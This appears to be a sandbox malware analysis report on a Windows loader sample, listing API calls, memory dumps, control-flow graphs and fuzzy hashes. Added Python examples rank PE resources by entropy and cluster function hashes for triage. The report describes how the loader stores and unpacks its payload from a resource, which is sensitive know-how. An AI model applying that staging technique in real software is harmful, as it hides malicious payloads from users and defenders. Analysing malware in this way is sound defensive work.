                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                                                                                            • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                            • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401DC4
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                            • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                            • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                            • _malloc.LIBCMT ref: 00401EBA
                                                                                                                            • _memset.LIBCMT ref: 00401EDD
                                                                                                                            • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
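The API sequence above (FindResourceA, LoadResource, LockResource, SizeofResource, then _malloc and _memset, with LoadLibraryA and GetProcAddress following in the same function's control-flow graph) is the usual shape of a loader that keeps its next stage inside a PE resource. The Python below is an added example, not Joe Sandbox's code or the sample's: it walks the resource tree of an image-mapped dump such as the 0x400000 region listed under Memory Dump Source and ranks the leaves by Shannon entropy, so an analyst can locate the candidate payload without executing the sample. It assumes the dump is laid out as a loaded image (RVA equal to offset), which is how a region dumped at its load base appears; it is not a parser for on-disk files with raw section offsets. The builder at the bottom produces a constructed fixture, and the RT_RCDATA type, name ID and language in it are illustrative values, not ones taken from this sample.

```python
"""Walk the resource tree of an image-mapped PE dump and rank leaf resources
by Shannon entropy. Added example for triaging the resource-loader pattern in
the API list above; not Joe Sandbox or sample code. Assumes RVA == offset
(a region dumped at its load base), not an on-disk file with raw sections."""
import math
import struct

IMAGE_DIRECTORY_ENTRY_RESOURCE = 2  # index into OptionalHeader.DataDirectory


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or uniform data, 8.0 for a flat distribution."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def resource_directory(image: bytes):
    """Return (rva, size) of the resource directory from the data directory."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    opt = e_lfanew + 4 + 20                           # skip Signature + IMAGE_FILE_HEADER
    magic = struct.unpack_from("<H", image, opt)[0]
    data_dir = opt + (96 if magic == 0x10B else 112)  # PE32 vs PE32+ optional header
    return struct.unpack_from("<II", image, data_dir + 8 * IMAGE_DIRECTORY_ENTRY_RESOURCE)


def iter_resources(image: bytes):
    """Yield ((type, name, lang), data) for every leaf of the three-level tree."""
    base, _size = resource_directory(image)
    if base == 0:
        return

    def entry_name(raw: int):
        if raw & 0x80000000:                          # IMAGE_RESOURCE_DIR_STRING_U
            off = base + (raw & 0x7FFFFFFF)
            length = struct.unpack_from("<H", image, off)[0]
            return image[off + 2:off + 2 + 2 * length].decode("utf-16-le")
        return raw                                    # numeric ID: RT_* type, name or LANGID

    def walk(dir_off: int, path: tuple):
        named, ids = struct.unpack_from("<HH", image, dir_off + 12)
        entry = dir_off + 16                          # entries follow IMAGE_RESOURCE_DIRECTORY
        for _ in range(named + ids):
            raw_name, target = struct.unpack_from("<II", image, entry)
            entry += 8
            node = path + (entry_name(raw_name),)
            if target & 0x80000000:                   # high bit set: subdirectory, base-relative
                yield from walk(base + (target & 0x7FFFFFFF), node)
            else:                                     # leaf: IMAGE_RESOURCE_DATA_ENTRY
                data_rva, size = struct.unpack_from("<II", image, base + target)
                yield node, image[data_rva:data_rva + size]

    yield from walk(base, ())


def rank_resources(image: bytes):
    """Leaves sorted by entropy, highest first: packed or encrypted payloads float to the top."""
    rows = [(path, len(data), round(shannon_entropy(data), 2))
            for path, data in iter_resources(image)]
    return sorted(rows, key=lambda r: (r[2], r[1]), reverse=True)


def build_test_image(payload: bytes, rtype=10, rname=101, lang=0x409) -> bytes:
    """Constructed fixture: a minimal PE32 image carrying one resource (RT_RCDATA=10 by default)."""
    img = bytearray(0x1000)
    res_dir, data_rva = 0x200, 0x400
    if len(payload) > len(img) - data_rva:
        raise ValueError("payload too large for fixture")
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)
    img[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", img, 0x84, 0x14C, 1, 0, 0, 0, 224, 0x102)  # IMAGE_FILE_HEADER
    opt = 0x84 + 20
    struct.pack_into("<H", img, opt, 0x10B)                                    # PE32 magic
    struct.pack_into("<II", img, opt + 96 + 8 * IMAGE_DIRECTORY_ENTRY_RESOURCE, res_dir, 0x100)

    def directory(off, ident, child, subdir):
        struct.pack_into("<IIHHHH", img, off, 0, 0, 0, 0, 0, 1)       # one ID entry
        struct.pack_into("<II", img, off + 16, ident, child | (0x80000000 if subdir else 0))

    directory(res_dir, rtype, 0x20, True)           # type -> name directory
    directory(res_dir + 0x20, rname, 0x40, True)    # name -> language directory
    directory(res_dir + 0x40, lang, 0x60, False)    # lang -> data entry
    struct.pack_into("<IIII", img, res_dir + 0x60, data_rva, len(payload), 0, 0)
    img[data_rva:data_rva + len(payload)] = payload
    return bytes(img)


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as fh:                # e.g. an image-mapped .sdmp region
        for path, size, entropy in rank_resources(fh.read()):
            print(f"{path!s:<32} {size:>8} bytes  entropy {entropy:.2f}")
```

Run it against the dumped region and look for a large leaf with entropy near 8.0; that is the blob the FindResourceA/LockResource path hands to the decryption and LoadLibraryA/GetProcAddress stage, and the one to carve out for the next round of analysis. A low-entropy leaf that still looks like a payload (a visible MZ header, readable strings) is worth a look too, since not every loader encrypts its stage.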
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000017.00000002.1639938993.0000000000426000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000017.00000002.1639938993.000000000044B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                            • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                            • API String ID: 2366190142-2962942730
                                                                                                                            • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                            • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                            • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                            • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: A
                                                                                                                            • API String ID: 0-3554254475
                                                                                                                            • Opcode ID: 0a99d7c2fd5e19dac75db49607163f83bfc8980338800e65d7a2e72f872b52c5
                                                                                                                            • Instruction ID: b958c6b90e4f43689e826c8ac7feb75c6363f974c11b2ae3078297b823ff272b
                                                                                                                            • Opcode Fuzzy Hash: 0a99d7c2fd5e19dac75db49607163f83bfc8980338800e65d7a2e72f872b52c5
                                                                                                                            • Instruction Fuzzy Hash: 76332D31D10B198EDB15EF68C89069DF7B1FF89300F15C79AE459AB211EB70AAC5CB81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d3523815acbdc18558b09d840270fc603cc882942d4d714519af67fb397e6fd2
                                                                                                                            • Instruction ID: 98c9d8564855015693720b32815486302dbcbedfc361f7f52fd82baee073a677
                                                                                                                            • Opcode Fuzzy Hash: d3523815acbdc18558b09d840270fc603cc882942d4d714519af67fb397e6fd2
                                                                                                                            • Instruction Fuzzy Hash: 4263D431D10B5A8ADB11EF68C884699F7B1FF99300F55C79AE458B7121EB70AAC4CF81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684983317.0000000041D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 41D60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41d60000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9d2342d02364e1717b86797c04fb58ec55100870af96599c62ea35775fe46df6
                                                                                                                            • Instruction ID: 880f91e05ac8e94cf759b13c7d1b1c61044b7ed4ad7377a6f0a8c2b55feb9135
                                                                                                                            • Opcode Fuzzy Hash: 9d2342d02364e1717b86797c04fb58ec55100870af96599c62ea35775fe46df6
                                                                                                                            • Instruction Fuzzy Hash: 1AF14D70A0020ACFEB04CFA9C984B9DBBF5BF98354F158159E405AF2A5DB70ED85CB52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: \V^m
                                                                                                                            • API String ID: 0-3751104571
                                                                                                                            • Opcode ID: 52563a366438cb8f597d3d0cc0ea47693a4969b65b97ea50e72adc03baa82b8f
                                                                                                                            • Instruction ID: 5fb889c0e0a2afadc155da3a0f46221c40bafd445e8e4cdb8bb96ed0fc8bc50f
                                                                                                                            • Opcode Fuzzy Hash: 52563a366438cb8f597d3d0cc0ea47693a4969b65b97ea50e72adc03baa82b8f
                                                                                                                            • Instruction Fuzzy Hash: 4EB16D70E04209CFDB14CFA9E8817DEBBF2AF89354F168129D815E7298EB749841CB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: \V^m
                                                                                                                            • API String ID: 0-3751104571
                                                                                                                            • Opcode ID: a0451eab4e7a7f1c5f37b601b51b8860fe452f460cd00a2058da79860850fac7
                                                                                                                            • Instruction ID: 9e253630c5a38b3ffe92f57410f4141aa0fd8b0d751f641434aade4d7d33d487
                                                                                                                            • Opcode Fuzzy Hash: a0451eab4e7a7f1c5f37b601b51b8860fe452f460cd00a2058da79860850fac7
                                                                                                                            • Instruction Fuzzy Hash: E4919E70E00349DFDF14CFA9D8807DEBBF2AF88354F118129E814AB298DB749946CB95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e678203c130f30d244eea772716aa5a39356fdc2cd9b384e21fcd4dda72b92bd
                                                                                                                            • Instruction ID: d5d116afe20448af681d7857fd25d00bc4a4ecb7bdaacc0db09274b4845d5c91
                                                                                                                            • Opcode Fuzzy Hash: e678203c130f30d244eea772716aa5a39356fdc2cd9b384e21fcd4dda72b92bd
                                                                                                                            • Instruction Fuzzy Hash: 1EB1AF70E00209CFDB14CFA9E8857DEBBF2BF88354F168529D415EB298EB749841CB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 156 411b5968-411b597f 157 411b5981-411b5984 156->157 158 411b59ab-411b59ae 157->158 159 411b5986-411b59a6 157->159 160 411b59b0-411b59d0 158->160 161 411b59d5-411b59d8 158->161 159->158 160->161 162 411b59da-411b59fa 161->162 163 411b59ff-411b5a02 161->163 162->163 165 411b5a29-411b5a2c 163->165 166 411b5a04-411b5a24 163->166 168 411b5a2e-411b5a4e 165->168 169 411b5a53-411b5a56 165->169 166->165 168->169 172 411b5a58-411b5a78 169->172 173 411b5a7d-411b5a80 169->173 172->173 176 411b5a82-411b5aa2 173->176 177 411b5aa7-411b5aaa 173->177 176->177 182 411b5aac-411b5acc 177->182 183 411b5ad1-411b5ad4 177->183 182->183 186 411b5afb-411b5afe 183->186 187 411b5ad6-411b5af6 183->187 192 411b5b00-411b5b20 186->192 193 411b5b25-411b5b28 186->193 187->186 192->193 196 411b5b2a-411b5b4a 193->196 197 411b5b4f-411b5b52 193->197 196->197 202 411b5b79-411b5b7c 197->202 203 411b5b54-411b5b74 197->203 206 411b5b7e-411b5b9e 202->206 207 411b5ba3-411b5ba6 202->207 203->202 206->207 212 411b5ba8-411b5bc8 207->212 213 411b5bcd-411b5bd0 207->213 212->213 216 411b5bd2-411b5bf2 213->216 217 411b5bf7-411b5bfa 213->217 216->217 222 411b5bfc-411b5c1c 217->222 223 411b5c21-411b5c24 217->223 222->223 226 411b5c4b-411b5c4e 223->226 227 411b5c26-411b5c46 223->227 232 411b5c50-411b5c70 226->232 233 411b5c75-411b5c78 226->233 227->226 232->233 236 411b5c7a-411b5c9a 233->236 237 411b5c9f-411b5ca2 233->237 236->237 242 411b5cc9-411b5ccc 237->242 243 411b5ca4-411b5cc4 237->243 246 411b5cce-411b5cee 242->246 247 411b5cf3-411b5cf6 242->247 243->242 246->247 252 411b5cf8-411b5d18 247->252 253 411b5d1d-411b5d20 247->253 252->253 256 411b5d22-411b5d42 253->256 257 411b5d47-411b5d4a 253->257 256->257 262 411b5d4c-411b5d6c 257->262 263 411b5d71-411b5d74 257->263 262->263 266 411b5d9b-411b5d9e 263->266 267 411b5d76-411b5d96 263->267 272 411b5da0-411b5dc0 266->272 273 411b5dc5-411b5dc8 266->273 267->266 272->273 276 411b5dca-411b5dd6 273->276 277 411b5def-411b5df2 273->277 299 411b5dde-411b5dea 276->299 282 411b5e19-411b5e1c 277->282 283 411b5df4-411b5e14 277->283 286 411b5e1e-411b5e2a 282->286 287 411b5e37-411b5e3a 282->287 283->282 307 411b5e32 286->307 292 411b5e3c-411b5e5c 287->292 293 411b5e61-411b5e64 287->293 292->293 296 411b5e8b-411b5e8e 293->296 297 411b5e66-411b5e86 293->297 302 411b5e9b-411b5e9e 296->302 303 411b5e90 296->303 297->296 299->277 309 411b5ea0-411b5ec0 302->309 310 411b5ec5-411b5ec8 302->310 314 411b5e96 303->314 307->287 309->310 312 411b5eca-411b5eea 310->312 313 411b5eef-411b5ef2 310->313 312->313 317 411b5f19-411b5f1c 313->317 318 411b5ef4-411b5f14 313->318 314->302 320 411b5f1e-411b5f3e 317->320 321 411b5f43-411b5f46 317->321 318->317 320->321 326 411b5f48-411b5f68 321->326 327 411b5f6d-411b5f70 321->327 326->327 329 411b5f72-411b5f74 327->329 330 411b5f81-411b5f84 327->330 372 411b5f76 call 411b8f1e 329->372 373 411b5f76 call 411b8e70 329->373 374 411b5f76 call 411b8e60 329->374 335 411b5fab-411b5fae 330->335 336 411b5f86-411b5fa6 330->336 338 411b5fb0-411b5fd0 335->338 339 411b5fd5-411b5fd8 335->339 336->335 338->339 345 411b5fda-411b5ffa 339->345 346 411b5fff-411b6002 339->346 340 411b5f7c 340->330 345->346 348 411b6029-411b602c 346->348 349 411b6004-411b6024 346->349 353 411b602e-411b604e 348->353 354 411b6053-411b6055 348->354 349->348 353->354 357 411b605c-411b605f 354->357 358 411b6057 354->358 357->157 361 411b6065-411b6072 357->361 358->357 372->340 373->340 374->340
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $P@A$$S@A$@d@A$HM@A$HV@A$H\@A$La@A$XR@A$`J@A$`Y@A$dO@A$dU@A$d^@A$|I@A$P@A$W@A$Z@A
                                                                                                                            • API String ID: 0-362482816
                                                                                                                            • Opcode ID: 9f9ccc973d84b76a13f17a056d2e84bf7c8bf0b409d05475a608c598511fcdee
                                                                                                                            • Instruction ID: 5ff0144db31bb40648aa81ade472b1ea4b82de937586a64cb5e1e773a1a24c5d
                                                                                                                            • Opcode Fuzzy Hash: 9f9ccc973d84b76a13f17a056d2e84bf7c8bf0b409d05475a608c598511fcdee
                                                                                                                            • Instruction Fuzzy Hash: 88027134711210ABC75A273AE1D823D3AA7FBCA755B69043ED403CB781DE76CD469B06
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 375 41a3659d-41a3662f GetCurrentProcess 380 41a36631-41a36637 375->380 381 41a36638-41a3666c GetCurrentThread 375->381 380->381 382 41a36675-41a366a9 GetCurrentProcess 381->382 383 41a3666e-41a36674 381->383 384 41a366b2-41a366cd call 41a36779 382->384 385 41a366ab-41a366b1 382->385 383->382 389 41a366d3-41a36702 GetCurrentThreadId 384->389 385->384 390 41a36704-41a3670a 389->390 391 41a3670b-41a3676d 389->391 390->391
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 41A3661E
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 41A3665B
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 41A36698
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 41A366F1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                            • String ID: pUA
                                                                                                                            • API String ID: 2063062207-1592006644
                                                                                                                            • Opcode ID: 1d266e6f2990683ab6ef58739dc337b1998ded65d90fb21d0c5c07aa3b4e435f
                                                                                                                            • Instruction ID: 9cf6140ed89eeaa29f753b089fe5379c77eb4f1ecd13effe95e49cdfa58bea2c
                                                                                                                            • Opcode Fuzzy Hash: 1d266e6f2990683ab6ef58739dc337b1998ded65d90fb21d0c5c07aa3b4e435f
                                                                                                                            • Instruction Fuzzy Hash: 395186B09007098FEB54CFAAC948BDEBBF5EB88310F208459E419A72A0DB746945CB65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 398 41a365a0-41a3662f GetCurrentProcess 402 41a36631-41a36637 398->402 403 41a36638-41a3666c GetCurrentThread 398->403 402->403 404 41a36675-41a366a9 GetCurrentProcess 403->404 405 41a3666e-41a36674 403->405 406 41a366b2-41a366cd call 41a36779 404->406 407 41a366ab-41a366b1 404->407 405->404 411 41a366d3-41a36702 GetCurrentThreadId 406->411 407->406 412 41a36704-41a3670a 411->412 413 41a3670b-41a3676d 411->413 412->413
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 41A3661E
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 41A3665B
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 41A36698
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 41A366F1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                            • String ID: pUA
                                                                                                                            • API String ID: 2063062207-1592006644
                                                                                                                            • Opcode ID: 37d540be4ee2c164fed16c1f0ac67a3c2acbb839977b787b9d239dee94f763e7
                                                                                                                            • Instruction ID: 0c01bc5a9c500e329c63785b54d00eb109c91e7c9a2a03cc8f9b650eec2bf5fe
                                                                                                                            • Opcode Fuzzy Hash: 37d540be4ee2c164fed16c1f0ac67a3c2acbb839977b787b9d239dee94f763e7
                                                                                                                            • Instruction Fuzzy Hash: FC5166B09007098FEB54CFAAD548BDEBBF1EB88310F248459E419A72A0DB346945CB65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%
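The three functions dumped from the 411B0000 region above carry near-identical Instruction Fuzzy Hash values, as do the two GetCurrentProcess/GetCurrentThread functions from 41A30000, which is why each of them appears under its own Similarity heading. The report does not document how its similarity score is computed, so the following is an added illustration (editor's example, not Joe Sandbox code) of one way to group such hashes: it assumes the hex digits are positionally comparable and uses a nibble-wise Hamming distance with single-linkage clustering. The hash values are copied from the report lines above; the labels and the distance threshold are the example's own choices.

```python
"""Group the Instruction Fuzzy Hash values listed in this report section.

Added example, not part of the Joe Sandbox report or its tooling.  The
report does not publish its similarity metric, so positional Hamming
distance over the hex digits is an assumption made here purely to show how
the near-duplicate functions cluster and the unrelated ones stay apart.
"""
from itertools import combinations

# Hash values copied verbatim from the report; the labels are ours and name the
# memory region the function was dumped from plus its order of appearance.
FUZZY_HASHES = {
    "411B0000 #1": "4EB16D70E04209CFDB14CFA9E8817DEBBF2AF89354F168129D815E7298EB749841CB85",
    "411B0000 #2": "E4919E70E00349DFDF14CFA9D8807DEBBF2AF88354F118129E814AB298DB749946CB95",
    "411B0000 #3": "1EB1AF70E00209CFDB14CFA9E8857DEBBF2BF88354F168529D415EB298EB749841CB85",
    "41A30000 #1": "395186B09007098FEB54CFAAC948BDEBBF5EB88310F208459E419A72A0DB746945CB65",
    "41A30000 #2": "FC5166B09007098FEB54CFAAD548BDEBBF1EB88310F248459E419A72A0DB346945CB65",
    "00400000 new": "67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E",
}


def hamming(a: str, b: str) -> int:
    """Number of hex-digit positions at which two equal-length hashes differ."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes must have equal length to compare positionally")
    return sum(x != y for x, y in zip(a.upper(), b.upper()))


def similarity(a: str, b: str) -> float:
    """Fraction of positions that agree, in [0.0, 1.0]."""
    return 1.0 - hamming(a, b) / len(a)


def cluster(hashes: dict, max_distance: int) -> list:
    """Single-linkage grouping via union-find: two labels end up in the same
    cluster when a chain of pairs, each within max_distance, connects them."""
    parent = {label: label for label in hashes}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    for a, b in combinations(hashes, 2):
        if hamming(hashes[a], hashes[b]) <= max_distance:
            parent[find(a)] = find(b)

    groups = {}
    for label in hashes:
        groups.setdefault(find(label), set()).add(label)
    # Largest clusters first, then alphabetically, for stable output.
    return sorted(groups.values(), key=lambda s: (-len(s), sorted(s)))


def cluster_of(label: str, hashes: dict, max_distance: int) -> set:
    """Return the cluster that contains `label`."""
    for group in cluster(hashes, max_distance):
        if label in group:
            return group
    raise KeyError(label)


if __name__ == "__main__":
    for a, b in combinations(FUZZY_HASHES, 2):
        d = hamming(FUZZY_HASHES[a], FUZZY_HASHES[b])
        print(f"{a:13s} vs {b:13s}: distance {d:2d}  similarity {similarity(FUZZY_HASHES[a], FUZZY_HASHES[b]):.2f}")
    # Threshold of 12 differing nibbles out of 70 is an arbitrary choice for
    # this data set; tune it against known-same and known-different functions.
    for group in cluster(FUZZY_HASHES, max_distance=12):
        print(sorted(group))
```

With these inputs the two 41A30000 functions differ in 8 of 70 positions and the first and third 411B0000 functions in 10, while any cross-region pair differs in far more, so a threshold of 12 keeps the regions apart. The threshold is data-dependent: a positional hash over unpacked code can drift with relocation or junk-instruction insertion, so calibrate it on functions you already know to be the same before trusting it for hunting.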

                                                                                                                            APIs
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                            • GetLastError.KERNEL32 ref: 00401940
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3322701435-0
                                                                                                                            • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                            • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                            • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                            • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 0040AF80
                                                                                                                              • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                              • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                              • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                            • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                              • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1411284514-0
